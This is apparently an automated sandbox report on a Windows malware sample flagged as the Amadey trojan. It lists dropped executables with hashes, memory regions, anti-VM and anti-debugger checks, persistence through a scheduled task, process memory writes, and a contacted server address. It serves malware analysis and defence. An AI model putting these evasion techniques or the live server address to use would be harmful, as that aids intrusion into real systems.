C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_e0ldsltr.cmp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/872-569-0x0000000007CE0000-0x0000000007EA2000-memory.dmp

memory/872-570-0x00000000083E0000-0x000000000890C000-memory.dmp

memory/5288-571-0x000001F3BAD50000-0x000001F3BAD62000-memory.dmp

memory/5288-572-0x000001F3BA9B0000-0x000001F3BA9BA000-memory.dmp

memory/872-578-0x0000000007FB0000-0x0000000008000000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000238001\file300un.exe

MD5 1f7fe7cc5b68e5bc6ae32bb490111307
SHA1 7eaa08bc7ccf48a00f97738dfaee69209a9f8105
SHA256 09ed1fc2dc304b8f74bbdc8538afefdce6ccde9ddf9106aa0602e80b573bc269
SHA512 d4f8994a40529b70c5c261b7a9fcb5cf83678282d44590e86df60787e21ff6faad2c525d41fdd192066c7a20c5ac27751185fb65debced0d8e527a9fba4f99c2

memory/4136-598-0x0000022DE3050000-0x0000022DE331E000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 dc61807302d0c9ae0d1096ae0f87816a
SHA1 60394118147b7b0e4085aebaaf06ff556da40add
SHA256 a7813d6080c17fbfdcb7cb6d1f4fb2afd9ff0c7ca3cbeab51704ccb1617410df
SHA512 4621308c7585d0073d65675620659b379187a13b885dbd26376525d509a32247705008114d1dd7e6da1705d9844f0adaa53a913a278409e0bfea79db2edfdfdb

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 9688a03006b5f30108bcae0f1167f8ae
SHA1 43c03dbd87ebd12aa26a47e119120f13cfdd602a
SHA256 aca25e4e2e95b6a4dfe19c8d379ebbc4ff90578cd831ea9472d4ec7f98088360
SHA512 9c74f856ea86aa074025cd665074c1591af9b2fdab348867adb7be9cb08121a8bdfb9e541383e730bac6842a039bc34e93cdbb5dd5f3632c4572a6ca483421b9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 c33ae13213a72fc1d3e1a24b4fa932aa
SHA1 2b6d74e21ffe141ec604aacacf3554354224791a
SHA256 0acbd3e02ddefc3a2903b33ba6579af3db7a639cba73356cb07dcc553a2fa3fc
SHA512 49d69ea35c133933714cb49d6093a83e0ab2362a12ee2905a97f8a5bcaed614bc698a189de616f7ef482d004da4844bd72a77b4da4338fb14672792ea2d46b06

C:\Users\Admin\AppData\Local\Temp\1000239001\mstc.exe

MD5 17eefbaaa30123fa3091add80026aed4
SHA1 8e43d736ea03bd33de5434bda5e20aae121cd218
SHA256 b780f8659c3cfab33ffa95b25b396b2b8ade8bd40c72aaf7c87ad3c6b6cf34c5
SHA512 e82fbbbfef61773fae1ed3e0767efa225ede0327ca5654de25e86359f4366942f85cf5542e67a52b24bb129d7fccf09fc68c64a73cf9269a75040d888005fa09

memory/4848-623-0x0000000000930000-0x0000000000942000-memory.dmp

memory/4384-624-0x00000000002A0000-0x0000000000895000-memory.dmp

memory/5296-625-0x0000000000230000-0x0000000000708000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000246001\lie.exe

MD5 24dd75b0a7bb9a0e0918ee0dd84a581a
SHA1 de796b237488df3d26a99aa8a78098c010aeb2c9
SHA256 878966291372a9633242af15570a8bbe31699b5e0b650e806af4742da1f6b35d
SHA512 53f951d795fbf760dd593619bb3f96fd604bc15adb4f637457d28fbd78ae3764afd4e9c9a755a6241431ad4664dd30e4a2df84e33fe59954f7c55da0e4038557

memory/4136-644-0x0000022DFD890000-0x0000022DFDB5E000-memory.dmp

memory/4136-645-0x0000022DE3710000-0x0000022DE376E000-memory.dmp

C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

MD5 154c3f1334dd435f562672f2664fea6b
SHA1 51dd25e2ba98b8546de163b8f26e2972a90c2c79
SHA256 5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f
SHA512 1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841

memory/2804-656-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/1208-658-0x0000000000400000-0x00000000009F0000-memory.dmp

memory/1680-678-0x0000000000400000-0x0000000000408000-memory.dmp

C:\Users\Admin\Pictures\4mpRxxHyryg3mbe6DkbwbRIw.exe

MD5 77f762f953163d7639dff697104e1470
SHA1 ade9fff9ffc2d587d50c636c28e4cd8dd99548d3
SHA256 d9e15bb8027ff52d6d8d4e294c0d690f4bbf9ef3abc6001f69dcf08896fbd4ea
SHA512 d9041d02aaca5f06a0f82111486df1d58df3be7f42778c127ccc53b2e1804c57b42b263cc607d70e5240518280c7078e066c07dec2ea32ec13fb86aa0d4cb499

C:\Users\Admin\Pictures\RZyn7DqIafXJbV2YZWLCctRp.exe

MD5 159403697f059e3b71d4806b14428963
SHA1 55b9352823e2fb03677792eb2a1eb10666a869e0
SHA256 dab1d4a92cb237fe291cd7306bf15759bc28528ed452c9a92f7373407f8f77be
SHA512 0761e34f7017659fb88792559b2d927b132169924dd2cb64250f6daa04b38d98aef7d533e943bc3e0899a542873ae9bdec504277eb94e066c673a1e007b1b1d1

memory/4384-739-0x00000000002A0000-0x0000000000895000-memory.dmp

C:\Users\Admin\Pictures\AYIMY5pgjRasql7ilmopJ53h.exe

MD5 0b3e3af99c3448f13af759df6b946591
SHA1 dcd16587f00c74e658e596ae60e203c64826bd5c
SHA256 0d56a917dcb1bdba6381eb8a235522e4c77f6c747ed84346f96c8a73d3e28d4f
SHA512 2a5f5bce89ee72f1732a1b56ab18fb6b1d223d45a2596e69fd3d9b179335f60c81f6638462f3d19d4f3a76183c37d64ece925ffc2ad3aee856dfa6ecfb6fb6e4

C:\Users\Admin\AppData\Local\Temp\Opera_installer_2404291542303543976.dll

MD5 45fe60d943ad11601067bc2840cc01be
SHA1 911d70a6aad7c10b52789c0312c5528556a2d609
SHA256 0715f9558363b04526499fcd6abf0b1946950af0a7f046a25f06b20dddb67add
SHA512 30c82f6b329fefa5f09a5974c36b70ea2bdab273e7d6eadd456fddcc2aa693f8f1cf096d57c3719d1106e9f85d50a4ffbf0ed7e66da2da0a5f23b6ee8c7194ba

memory/2804-796-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/5296-797-0x0000000000230000-0x0000000000708000-memory.dmp

memory/5780-801-0x0000000002200000-0x0000000002251000-memory.dmp

C:\Users\Admin\Pictures\V7w4GBUasgpenxOz5JxWuHLp.exe

MD5 e13e77e4db785816f7a4e6ab6a0242d6
SHA1 3384dd77791dd538b7c74a9b7a1eb08b255ec303
SHA256 d709b851b77aa0be36e457273efcefdb710c7d62e95191c930411d1c2dec5edb
SHA512 4087532917db0573a931f5ddb783241ab7af42216a4a7528b37ad3b2bc7d2dd9cfc1459acba7629b0349d74f8475bb8423d2b18046038df78b24515d05c5d058

memory/6128-810-0x0000000140000000-0x0000000140786000-memory.dmp

memory/4384-809-0x00000000002A0000-0x0000000000895000-memory.dmp

memory/5780-808-0x0000000000400000-0x00000000005C4000-memory.dmp

C:\Windows\System32\GroupPolicy\gpt.ini

MD5 8ef9853d1881c5fe4d681bfb31282a01
SHA1 a05609065520e4b4e553784c566430ad9736f19f
SHA256 9228f13d82c3dc96b957769f6081e5bac53cffca4ffde0ba1e102d9968f184a2
SHA512 5ddee931a08cfea5bb9d1c36355d47155a24d617c2a11d08364ffc54e593064011dee4fea8ac5b67029cab515d3071f0ba0422bb76af492a3115272ba8feb005

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\opera_package

MD5 b7e7c07657383452919ee39c5b975ae8
SHA1 2a6463ac1eb8be1825b123b12f75c86b7fff6591
SHA256 1d3f55e541be41e98341cb1d7b5d10487f886093370bdccdb26c70c322246bb9
SHA512 daeabc9a4d76e1107681e96b1371682fa6dd589001f8b03fe41165d5c32a96179daeac359f86772c9768fdbdee271c16f92ad0dbd10b2fc7cde3970f0c92aa39

memory/5780-836-0x0000000002200000-0x0000000002251000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404291542301\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe

MD5 15d8c8f36cef095a67d156969ecdb896
SHA1 a1435deb5866cd341c09e56b65cdda33620fcc95
SHA256 1521c69f478e9ced2f64b8714b9e19724e747cd8166e0f7ab5db1151a523dda8
SHA512 d6f48180d4dcb5ba83a9c0166870ac00ea67b615e749edf5994bc50277bf97ca87f582ac6f374c5351df252db73ee1231c943b53432dbb7563e12bbaf5bb393a

memory/2804-852-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/5296-856-0x0000000000230000-0x0000000000708000-memory.dmp

memory/4384-855-0x00000000002A0000-0x0000000000895000-memory.dmp

memory/5296-868-0x0000000000230000-0x0000000000708000-memory.dmp

memory/6128-865-0x0000000140000000-0x0000000140786000-memory.dmp

C:\Users\Admin\Pictures\LUGDqNIwCPuioSPNANHhyelx.exe

MD5 a63018cc078f57c640ac2ec8ed84dead
SHA1 1f5c17894a755114527e92304f4a74195c48031d
SHA256 41d01d8fc610b6ceb17687c58973ee8f6a7bbdc1eb6deb19297e3f4c4c62b558
SHA512 a42f522745bbe8b36ea60d7688a713bce89df2f7b0f5c7ad7b32bc43989fca71e00d817692263ea4004ad6be23e64dd9d3d2f1dfbe7b5038cf4b79b7064a9864

memory/4384-888-0x00000000002A0000-0x0000000000895000-memory.dmp

memory/2956-900-0x0000000000420000-0x0000000000A94000-memory.dmp

memory/3572-901-0x0000000002510000-0x0000000002546000-memory.dmp

memory/3572-902-0x0000000005150000-0x0000000005778000-memory.dmp

memory/3572-903-0x00000000050B0000-0x00000000050D2000-memory.dmp

memory/3572-904-0x0000000005780000-0x00000000057E6000-memory.dmp

memory/3572-916-0x0000000005960000-0x0000000005CB4000-memory.dmp

memory/3572-917-0x0000000005E20000-0x0000000005E3E000-memory.dmp

memory/3572-918-0x0000000005E70000-0x0000000005EBC000-memory.dmp

memory/3572-919-0x00000000070A0000-0x0000000007136000-memory.dmp

memory/3572-920-0x0000000006290000-0x00000000062AA000-memory.dmp

memory/3572-924-0x00000000062E0000-0x0000000006302000-memory.dmp

memory/1720-936-0x0000000005FE0000-0x000000000602C000-memory.dmp

memory/5748-941-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/5828-943-0x0000000000420000-0x0000000000A94000-memory.dmp

memory/5748-945-0x0000000000DE0000-0x0000000001280000-memory.dmp

memory/4080-951-0x00000000047F0000-0x0000000004B44000-memory.dmp

memory/4848-1000-0x000000001C390000-0x000000001C3AE000-memory.dmp

memory/2956-1001-0x0000000000420000-0x0000000000A94000-memory.dmp

memory/4848-1002-0x000000001DD10000-0x000000001DDB2000-memory.dmp

memory/4848-1003-0x000000001E1B0000-0x000000001E1D0000-memory.dmp

memory/4848-1004-0x0000000020320000-0x0000000020670000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD1D2.tmp

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2

C:\Users\Admin\AppData\Local\Temp\tmpD1E7.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmpD212.tmp

MD5 40f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1 d6582ba879235049134fa9a351ca8f0f785d8835
SHA256 cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512 cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2

memory/5828-1182-0x0000000000420000-0x0000000000A94000-memory.dmp

memory/4848-1183-0x000000001DA10000-0x000000001DA24000-memory.dmp

memory/5828-1192-0x0000000000420000-0x0000000000A94000-memory.dmp

memory/3496-1191-0x0000000000470000-0x0000000000AE4000-memory.dmp

C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi

MD5 e502009a6e1ce7df55efadd8191aff58
SHA1 5fcac10e924f51c4937e652b91e2502d89216a0a
SHA256 67e197b1782c45d9141f55f31bae429c36a17c1095582b917a626f542b9e81e8
SHA512 d155ee7da820cae2f2eb71ad4d13c74d72dcacc57d4e183772a119d7fcda702075a027f320501863d374938d20f7e08e69c10f3bad3050d89e59abc24c09586f

memory/836-1251-0x0000000004FA0000-0x0000000004FEC000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json

MD5 238d2612f510ea51d0d3eaa09e7136b1
SHA1 0953540c6c2fd928dd03b38c43f6e8541e1a0328
SHA256 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
SHA512 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json

MD5 0b1cf3deab325f8987f2ee31c6afc8ea
SHA1 6a51537cef82143d3d768759b21598542d683904
SHA256 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
SHA512 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json

MD5 2a1e12a4811892d95962998e184399d8
SHA1 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
SHA256 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
SHA512 bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\geiolieogaichbpfhcannipendgnnbkn\1.0.1_0\_locales\es\messages.json

MD5 bd6b60b18aee6aaeb83b35c68fb48d88
SHA1 9b977a5fbf606d1104894e025e51ac28b56137c3
SHA256 b7b119625387857b257dd3f4b20238cdbe6c25808a427f0110bcb0bf86729e55
SHA512 3500b42b17142cd222bc4aa55bf32d719dbd5715ff8d0924f1d75aec4bc6aa8e9ca8435f0b831c73a65cc1593552b9037489294fbf677ba4e1cec1173853e45b

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\rvwtj7c1.default-release\prefs.js

MD5 75f287cf7cf5a26997e2e96c3ad64d35
SHA1 e22532347744064b04458329fe7d1853e2f9dde7
SHA256 133dd2f9c65cc0862e9444849ad7606baba2d5d087f16a7b24126ed8ba2ff163
SHA512 bc731de05dc4807c4a2a1870352d9e619c3d636e622d6b3a2d0972635fffd5dc4d4da4f1379ca6aaf561ba9ca493fcad4bbb5eb88aef6425da32b2114b12ad46

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 cb9c2ff24c7d344aba774f1269efa2cf
SHA1 812c40a5e97054a7cd303ce7fb0863eb4e5209bc
SHA256 1a9836b87170b9455ad4b9f3d35e8976c6e2e52f5bae6d5e039e9bcaa426f322
SHA512 277eb1565c26a019b212614a08ae343a9660aa5640ca61a834bdb919c2d468efd95fe7a5a5c0fe810323d51dc16af25fcf3056e4e29dbf3f62fbdf9701467be5

memory/2956-1665-0x0000000000420000-0x0000000000A94000-memory.dmp

memory/3496-1674-0x0000000000470000-0x0000000000AE4000-memory.dmp

C:\Users\Admin\Pictures\pii7D8Eu2OpnTZhxUVxzTrTz.exe

MD5 8d82aab981db33a652f25f1951eb1bf8
SHA1 88f484430f353879f4ababe64ed8919551ac5b47
SHA256 0f03bbc5a23c73c203f9dcedee184f8ba5842d33e7ec305f3eb244c1ed41765a
SHA512 fce582dee14cbafddf3987e5bf47b7e2c7fa235b71f05aa109f200c1b70d3ee55c2e18523ecfaaa1a243b9b8680a28c60037793bd302203417e2add7c00a6e26

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Install.exe

MD5 90487eb500021dbcb9443a2cf972a204
SHA1 62ae31665d462c8e5d6632f389b1e94afb9bf00d
SHA256 4a86ca84b985a5228eccd13f225bb403e9574e7f64b900a9acc4d32bcb732ff2
SHA512 8cb3b1ae44246bee8bf2b81220d7a5782c4e82b2b871a81bdc9ea170fbe477d7be59c3543554f2cdefde7422bcc88b6624b966dff1603c79d277329fb2074d17

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\AuthHost.exe

MD5 14f675f8506da96c2f1c47c7be5abdaa
SHA1 34f4929d325f4ed7b7d3d318f6b6142f8a5013ae
SHA256 6778d42a25b4ab28fa157d9b9eb63dc826c8a6faac650ecb5e33b13954f88db1
SHA512 d1f3e24a3f1440421de4b5daf2880e74187ce96aa53eae466b49edcedd2e2d988c2e51c1aeebf6e162ced41b4d727e97f654ded6e71a79363665ea033c2c38f0

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\bootsect.exe

MD5 68c39a577225aeb6b28ea3558e683c19
SHA1 0504785549d7a3ac936c425b14253f779e580bc3
SHA256 6a4e0396657ace212c955b4c95ddc357be66c2c9968dcd7a909bf4cc32f59841
SHA512 fdb7398aff07be9630be5f8d6e8f415c22fc363fae9f6df816a72c6fbef7b93fe3def26a2f7dbe755a5035fb8efa912022eb80a514f8f04a0a9b25c90e8b557a

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\Info.xml

MD5 0456be6047774e5d0b8045b787048924
SHA1 76f6445368a4462a50e502bc272a8efc2eb33cb0
SHA256 1c4440a8312e16bc682277164cc6710b37fc3dcac5ef9aa0ba7e77fc0c1f4897
SHA512 c0f0cf97e0fd0b258b9a9fa6466dd9e390cd79f3edb0f5b9f10137c241c6b079061135c44c0c30dc71c28f1b7b929c65eb1112761e53cd8400d7e07ce1a7b99c

C:\Users\Admin\AppData\Local\Temp\7zS44FE.tmp\attrib.exe

MD5 a243bc9db0bfb5f22e146b88bb10c58f
SHA1 a5ff3845b0f55157c4aea35e9eae213560acdb5c
SHA256 0758152947f1a550e52ce8e3f9bcd988a23d36a458ad953795769b11c38ff2ea
SHA512 58c668e9ab61f3af13e1a5a52930b5c6e281d7d85d1180ca82ccca4268b3d3a93a25e8ed7a1c2d126e88eaf7d3ad38cd051974c9b200c13b5a4584e221ee8161

memory/5596-1729-0x0000000000190000-0x0000000000804000-memory.dmp

memory/5756-1744-0x0000000000DE0000-0x0000000001280000-memory.dmp

C:\Windows\System32\DRVSTORE\VBoxDrv_A74DBC1DC66E4A6300641C79D3B73B2FD2C2E5F9\VBoxDrv.sys

MD5 321ccdb9223b0801846b9ad131ac4d81
SHA1 ac8fb0fc82a8c30b57962fe5d869fda534053404
SHA256 05045c57480d3d5996e10a60393e799647c4ddaf6ede5f712d520c2a2841d43b
SHA512 75b5cfd1dfe7da31f8988e2e76ca4ad21784acf9fc26a2593e567eb7e54036026c5249695614f8f1b53873fa9bf82e864b609d2f863717b8363189de7284754a

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-29 15:41

Reported

2024-04-29 15:44

Platform

win11-20240419-en

Max time kernel

147s

Max time network

150s

Command Line

"C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe"

Signatures

Amadey

trojan amadey

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878097196-921257239-309638238-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\explorta.job C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3340 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 3340 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe
PID 3340 wrote to memory of 2872 N/A C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

Processes

C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe

"C:\Users\Admin\AppData\Local\Temp\cdec8d4c23ee4137e25482264032a1fa51366c1eae736e7bd1146d59c4c9ed09.exe"

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

"C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe"

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

C:\Users\Admin\AppData\Local\Temp\5454e6f062\explorta.exe

Network

Country Destination Domain Proto
RU 193.233.132.139:80 tcp
RU 193.233.132.139:80 tcp

Files

memory/3340-0-0x0000000000E00000-0x00000000012A0000-memory.dmp

memory/3340-1-0x0000000077896000-0x0000000077898000-memory.dmp

memory/3340-3-0x0000000005510000-0x0000000005511000-memory.dmp

memory/3340-4-0x00000000054F0000-0x00000000054F1000-memory.dmp

memory/3340-2-0x0000000005500000-0x0000000005501000-memory.dmp

memory/3340-6-0x00000000054D0000-0x00000000054D1000-memory.dmp

memory/3340-7-0x00000000054E0000-0x00000000054E1000-memory.dmp

